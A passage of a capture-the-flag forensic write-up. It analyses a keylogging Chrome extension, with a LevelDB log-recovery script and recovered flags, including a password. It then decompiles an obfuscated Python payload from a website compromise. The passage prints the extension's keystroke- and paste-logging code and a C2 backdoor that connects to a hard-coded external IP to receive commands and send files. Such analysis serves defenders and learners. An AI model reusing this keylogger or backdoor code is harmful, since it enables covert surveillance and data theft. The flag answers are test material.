class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span 
class=\"token punctuation\">(</span><span class=\"token parameter\">data</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>data<span class=\"token punctuation\">.</span>log<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            data<span class=\"token punctuation\">.</span>log <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n\n        data<span class=\"token punctuation\">.</span>log <span class=\"token operator\">+=</span> s<span class=\"token punctuation\">;</span>\n\n        chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">set</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">'log'</span><span class=\"token operator\">:</span> data<span class=\"token punctuation\">.</span>log <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span>onConnect<span class=\"token punctuation\">.</span><span class=\"token function\">addListener</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">port</span><span class=\"token punctuation\">)</span> <span class=\"token 
operator\">=></span> <span class=\"token punctuation\">{</span>\n\n    console<span class=\"token punctuation\">.</span><span class=\"token function\">assert</span><span class=\"token punctuation\">(</span>port<span class=\"token punctuation\">.</span>name <span class=\"token operator\">===</span> <span class=\"token string\">\"conn\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"v1.2.1\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    port<span class=\"token punctuation\">.</span>onMessage<span class=\"token punctuation\">.</span><span class=\"token function\">addListener</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\"><span class=\"token punctuation\">{</span> type<span class=\"token punctuation\">,</span> data <span class=\"token punctuation\">}</span></span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>type <span class=\"token operator\">===</span> <span class=\"token string\">'key'</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token function\">addLog</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>type <span class=\"token operator\">==</span> <span class=\"token string\">'paste'</span><span class=\"token punctuation\">)</span> 
<span class=\"token punctuation\">{</span>\n            <span class=\"token function\">addLog</span><span class=\"token punctuation\">(</span><span class=\"token string\">'PASTE:'</span> <span class=\"token operator\">+</span> data<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span>onMessage<span class=\"token punctuation\">.</span><span class=\"token function\">addListener</span><span class=\"token punctuation\">(</span>\n    <span class=\"token keyword\">function</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">request<span class=\"token punctuation\">,</span> sender<span class=\"token punctuation\">,</span> sendResponse</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>request<span class=\"token punctuation\">.</span>check <span class=\"token operator\">===</span> <span class=\"token string\">\"replace_html\"</span> <span class=\"token operator\">&amp;&amp;</span> chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"replace_html\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token function\">sendResponse</span><span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">url</span><span class=\"token operator\">:</span> chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'replace_html_url'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>So, by searching the file list again for files under <code class=\"language-text\">C:\\\\Users\\selene\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nnjofihdjilebhiiemfmdlpbdkbjcpae</code>, I was able to identify the Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 4. 
After examining the malicious extension's code, what is the log filename in which the data is stored</span>\n000003.log</code></pre></div>\n<p>Next, dumping this log file let me determine that the next Flag was <code class=\"language-text\">drive.google.com</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ca38dcb03e8c46b76852451c1cabcae6/bb5d0/image-20250327223202684.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAyklEQVQI1xWOT0/CUBDE+0n4077X1hbe4xWl1NLQCgEN8WbizXjR4MGbicH43X+Oh8nu7MzObpQbwy7LaMqSbuHZq79PU1pjSRPDXHozGrEaj7meTDDiLo7pVFv56qKgKAuqJKGdTon+xS8NP8OSH+85O8clBN5lrqxhkefUWU6vhSGJqVPLUtrKWnrhoPmteCMEPRPd6OpLcUVzd2LYPbIdThy7gbN3fMt0UejrbMZDvWbfbTkIx3bDk/N8zB2/Cn3TwedQ0a8b/gAkoWBG6HE2nQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ca38dcb03e8c46b76852451c1cabcae6/8ac56/image-20250327223202684.webp 240w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/d3be9/image-20250327223202684.webp 480w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/e46b2/image-20250327223202684.webp 960w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/f992d/image-20250327223202684.webp 1440w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/05fe0/image-20250327223202684.webp 1453w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ca38dcb03e8c46b76852451c1cabcae6/8ff5a/image-20250327223202684.png 
240w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/e85cb/image-20250327223202684.png 480w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/d9199/image-20250327223202684.png 960w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/07a9c/image-20250327223202684.png 1440w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/bb5d0/image-20250327223202684.png 1453w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ca38dcb03e8c46b76852451c1cabcae6/d9199/image-20250327223202684.png\"\n            alt=\"image-20250327223202684\"\n            title=\"image-20250327223202684\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 5. 
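(see below)</span></code></pre></div>\n<p>The <code class=\"language-text\">000003.log</code> dumped above is a LevelDB write-ahead log: Chrome backs <code class=\"language-text\">chrome.storage.local</code> with LevelDB, so every <code class=\"language-text\">set()</code> issued by the extension's <code class=\"language-text\">addLog</code> lands in this file as a write batch, which is why the growing <code class=\"language-text\">log</code> value is visible to <code class=\"language-text\">strings</code>. The following Python script is an added example, not code from the writeup or from the extension: it walks the 32 KiB blocks, checks each record's masked CRC-32C, reassembles fragmented records and replays the write batches in order, so the last value written for the <code class=\"language-text\">log</code> key is recovered instead of whichever fragment <code class=\"language-text\">strings</code> happens to print first. It assumes an intact log, that the key of interest is <code class=\"language-text\">log</code>, and that string values are stored JSON-serialised (Chrome's encoding); the sample log and the pasted secret inside it are constructed.</p>

```python
# Added example (not code from the writeup or from the extension): replay the
# LevelDB write-ahead log (.log) that backs chrome.storage.local, as dumped from
# Local Extension Settings. Assumes an intact log, the key "log", and Chrome's
# JSON serialisation of string values.
import json
import struct

BLOCK_SIZE = 32768                      # LevelDB log block size
FULL, FIRST, MIDDLE, LAST = 1, 2, 3, 4  # record types; type 0 is padding
MASK_DELTA = 0xA282EAD8                 # LevelDB's CRC masking constant

def crc32c(data: bytes) -> int:         # CRC-32C (Castagnoli), bitwise
    crc = 0xFFFFFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x82F63B78 if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF

def mask_crc(crc: int) -> int:          # LevelDB: rotate right 15, add delta
    return (((crc >> 15) | (crc << 17)) + MASK_DELTA) & 0xFFFFFFFF

def unmask_crc(masked: int) -> int:
    rot = (masked - MASK_DELTA) & 0xFFFFFFFF
    return ((rot >> 17) | (rot << 15)) & 0xFFFFFFFF

def read_varint(buf: bytes, pos: int):  # varint32: 7 bits per byte, LSB first
    value = shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7

def iter_batches(data: bytes):
    """Walk 32 KiB blocks, verify each record's CRC, reassemble fragments."""
    pos, partial = 0, b""
    while pos + 7 <= len(data):
        left = BLOCK_SIZE - pos % BLOCK_SIZE
        if left < 7:                    # block trailer: skip to the next block
            pos += left
            continue
        checksum, length, rtype = struct.unpack_from("<IHB", data, pos)
        payload = data[pos + 7:pos + 7 + length]
        pos += 7 + length
        if len(payload) < length:       # truncated dump: keep what we have
            break
        if unmask_crc(checksum) != crc32c(bytes([rtype]) + payload):
            partial = b""               # corrupt record: drop its batch
        elif rtype == FULL:
            yield payload
        elif rtype == FIRST:
            partial = payload
        elif rtype == MIDDLE:
            partial += payload
        elif rtype == LAST:
            yield partial + payload
            partial = b""

def parse_batch(batch: bytes):          # yields (sequence, key, value|None)
    seq, count = struct.unpack_from("<QI", batch, 0)
    pos = 12
    for i in range(count):
        tag = batch[pos]                # 1 = kTypeValue, 0 = kTypeDeletion
        klen, pos = read_varint(batch, pos + 1)
        key, pos = batch[pos:pos + klen], pos + klen
        value = None
        if tag == 1:
            vlen, pos = read_varint(batch, pos)
            value, pos = batch[pos:pos + vlen], pos + vlen
        yield seq + i, key, value

def replay_storage(data: bytes) -> dict:
    """Apply batches in order; the last write to a key wins, as in LevelDB."""
    state = {}
    for batch in iter_batches(data):
        for _, key, value in parse_batch(batch):
            name = key.decode("utf-8", "replace")
            if value is None:
                state.pop(name, None)   # deletion tombstone
            else:                       # JSON string values, else raw bytes
                state[name] = json.loads(value) if value[:1] == b'"' else value
    return state

def build_log(writes) -> bytes:         # constructed sample writer: FULL records
    out = b""
    for seq, (key, value) in enumerate(writes, start=1):
        entry = b"\x01" + bytes([len(key)]) + key + bytes([len(value)]) + value
        batch = struct.pack("<QI", seq, 1) + entry
        crc = mask_crc(crc32c(bytes([FULL]) + batch))
        out += struct.pack("<IHB", crc, len(batch), FULL) + batch
    return out

# Constructed sample: the keylogger rewrites the whole "log" value on every key
SAMPLE_LOG = build_log([(b"log", json.dumps(s).encode()) for s in (
    "d", "dr|Enter|\r\n", "dr|Enter|\r\nPASTE:constructed-secret\r\n")])

def recovered_keylog(data: bytes = SAMPLE_LOG) -> str:
    return replay_storage(data).get("log", "")
```

<p>Against a real dump, call <code class=\"language-text\">replay_storage(open(path, \"rb\").read())</code>: keys deleted later in the log are removed from the result, and a record with a bad checksum only discards its own batch, so a log page that was partially overwritten in the memory image still yields every batch that survived intact.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 5. 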
What is the URL the user navigated to</span>\ndrive.google.com</code></pre></div>\n<p>By continuing to read the same log, I was also able to determine the final Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 6. What is the password of selene@rangers.eldoria.com</span>\nclip-mummify-proofs</code></pre></div>\n<h2 id=\"toolpieforensic\" style=\"position:relative;\"><a href=\"#toolpieforensic\" aria-label=\"toolpieforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>ToolPie(Forensic)</h2>\n<blockquote>\n<p>In the bustling town of Eastmarsh, Garrick Stoneforge’s workshop site once stood as a pinnacle of enchanted lock and toolmaking. But dark whispers now speak of a breach by a clandestine faction, hinting that Garrick’s prized designs may have been stolen. Scattered digital remnants cling to the compromised site, awaiting those who dare unravel them. Unmask these cunning adversaries threatening the peace of Eldoria. 
Investigate the incident, gather evidence, and expose Malakar as the mastermind behind this attack.</p>\n</blockquote>\n<p>Analyzing the provided pcap file showed that it captured traffic in which exploit code was injected into the site from an external host.</p>\n<p>From the source IP and request path in this traffic, I was able to identify the first two Flags.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 1. What is the IP address responsible for compromising the website?</span>\n<span class=\"token number\">194.59</span>.6.66\n\n<span class=\"token comment\"># 2. What is the name of the endpoint exploited by the attacker?</span>\nexecute</code></pre></div>\n<p>Looking at the exploit code executed here, I found that it loads and executes bytecode by passing data decompressed with <code class=\"language-text\">bz2.decompress</code> into <code class=\"language-text\">marshal.loads</code>.</p>\n<p>So, in order to disassemble this code with <code class=\"language-text\">dis</code>, I ran the following script using Python 3.13.</p>\n<p>To load executable code with <code class=\"language-text\">marshal.loads</code>, you need to match the Python version to the bytecode being loaded: the marshal format and the bytecode it contains are specific to the interpreter version that produced them.</p>\n<p>With the default-installed Python 3.10 and Python 3.12, it failed partway through with an error, and I could not load the full code.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> add-apt-repository ppa:deadsnakes/ppa\n<span class=\"token function\">sudo</span> <span class=\"token function\">apt</span> <span class=\"token function\">install</span> python3.13-full\npython3.13 -m ensurepip --upgrade</code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> marshal\n<span class=\"token keyword\">import</span> bz2\n<span class=\"token keyword\">import</span> dis\n\n<span class=\"token comment\"># The captured payload is pasted here as an escaped string literal</span>\npayload <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token string\">b\"&lt;payload>\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># Undo the escaping so that payload holds the raw compressed bytes</span>\npayload <span class=\"token operator\">=</span> payload<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token string\">'unicode_escape'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">'latin1'</span><span class=\"token punctuation\">)</span>\n\ndec <span class=\"token operator\">=</span> bz2<span class=\"token punctuation\">.</span>decompress<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>dec<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># The Python version must match the bytecode for marshal.loads to succeed</span>\ncode_obj <span class=\"token operator\">=</span> marshal<span class=\"token punctuation\">.</span>loads<span class=\"token punctuation\">(</span>dec<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>code_obj<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Disassemble the recovered code object instead of executing it</span>\ndis<span class=\"token punctuation\">.</span>dis<span class=\"token punctuation\">(</span>code_obj<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Disassembling the executed code with the script above let me identify the third Flag as <code class=\"language-text\">Py-Fuscate</code>.</p>\n<div class=\"gatsby-highlight\" 
data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># 3. What is the name of the obfuscation tool used by the attacker?</span>\nPy<span class=\"token operator\">-</span>Fuscate</code></pre></div>\n<p>Furthermore, based on the following decompilation of the disassembled bytecode, produced with OpenAI, I was also able to recover the fourth Flag, the IP, and the fifth Flag, the key, from the packet capture.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> socket\n<span class=\"token keyword\">import</span> threading\n<span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> random\n<span class=\"token keyword\">import</span> string\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>Padding <span class=\"token keyword\">import</span> pad<span class=\"token punctuation\">,</span> unpad\n\nBUFFER_SIZE <span class=\"token operator\">=</span> <span class=\"token number\">4096</span>\nSEPARATOR <span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;SEPARATOR>\"</span>\nCONN <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\n\n<span class=\"token comment\"># AES encryption function (CBC mode; the key is reused as the IV)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">enc_mes</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    cypher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_CBC<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    cypher_block <span class=\"token operator\">=</span> <span class=\"token number\">16</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">type</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span> <span class=\"token builtin\">bytes</span><span class=\"token punctuation\">:</span>\n        mes <span class=\"token operator\">=</span> mes<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">return</span> cypher<span class=\"token punctuation\">.</span>encrypt<span class=\"token punctuation\">(</span>pad<span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> cypher_block<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># AES decryption function</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">dec_mes</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> mes <span class=\"token operator\">==</span> <span class=\"token string\">b''</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> mes\n    cypher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_CBC<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    cypher_block <span class=\"token operator\">=</span> <span class=\"token number\">16</span>\n    <span class=\"token keyword\">return</span> unpad<span class=\"token punctuation\">(</span>cypher<span class=\"token punctuation\">.</span>decrypt<span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> cypher_block<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Function that receives a file from the C2 server</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">receive_file</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    client2 <span class=\"token operator\">=</span> socket<span class=\"token punctuation\">.</span>socket<span class=\"token punctuation\">(</span>socket<span class=\"token punctuation\">.</span>AF_INET<span class=\"token punctuation\">,</span> socket<span class=\"token punctuation\">.</span>SOCK_STREAM<span class=\"token punctuation\">)</span>\n    client2<span class=\"token punctuation\">.</span>connect<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token string\">'13.61.7.218'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">54163</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n   
 k <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>SystemRandom<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>choice<span class=\"token punctuation\">(</span>string<span class=\"token punctuation\">.</span>ascii_letters <span class=\"token operator\">+</span> string<span class=\"token punctuation\">.</span>digits<span class=\"token punctuation\">)</span> <span class=\"token keyword\">for</span> _ <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    client2<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>k<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n    enc_received <span class=\"token operator\">=</span> client2<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span>BUFFER_SIZE<span class=\"token punctuation\">)</span>\n    received <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>enc_received<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n    filename<span class=\"token punctuation\">,</span> filesize <span class=\"token operator\">=</span> received<span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span>SEPARATOR<span class=\"token punctuation\">)</span>\n\n    ok_enc <span 
class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token string\">'ok2'</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n    client2<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>ok_enc<span class=\"token punctuation\">)</span>\n\n    total_bytes <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    msg <span class=\"token operator\">=</span> <span class=\"token string\">b''</span>\n\n    <span class=\"token keyword\">while</span> total_bytes <span class=\"token operator\">&lt;</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>filesize<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        bytes_read <span class=\"token operator\">=</span> client2<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span>BUFFER_SIZE<span class=\"token punctuation\">)</span>\n        msg <span class=\"token operator\">+=</span> bytes_read\n        total_bytes <span class=\"token operator\">+=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>bytes_read<span class=\"token punctuation\">)</span>\n\n    decr_file <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>msg<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>filename<span class=\"token punctuation\">,</span> <span class=\"token string\">'wb'</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>decr_file<span class=\"token punctuation\">)</span>\n\n   
 client2<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Main loop that waits for commands from the attacker</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">receive</span><span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n        msg <span class=\"token operator\">=</span> client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span>\n        msg <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>msg<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n        message <span class=\"token operator\">=</span> msg<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">if</span> msg <span class=\"token operator\">==</span> <span class=\"token string\">b''</span><span class=\"token punctuation\">:</span>\n            time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">10</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">continue</span>\n\n        <span class=\"token keyword\">if</span> message <span class=\"token operator\">==</span> <span class=\"token string\">\"check\"</span><span class=\"token punctuation\">:</span>\n            enc_answ <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token string\">\"check-ok\"</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>enc_answ<span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">elif</span> message <span class=\"token operator\">==</span> <span class=\"token string\">\"send_file\"</span><span class=\"token punctuation\">:</span>\n            threading<span class=\"token punctuation\">.</span>Thread<span class=\"token punctuation\">(</span>target<span class=\"token operator\">=</span>receive_file<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>start<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">elif</span> message <span class=\"token operator\">==</span> <span class=\"token string\">\"get_file\"</span><span class=\"token punctuation\">:</span>\n            okenc <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token string\">\"ok\"</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n            client<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>okenc<span class=\"token punctuation\">)</span>\n\n            path_to_file <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>client<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n\n            <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>path_to_file<span class=\"token punctuation\">,</span> <span class=\"token string\">'rb'</span><span class=\"token 
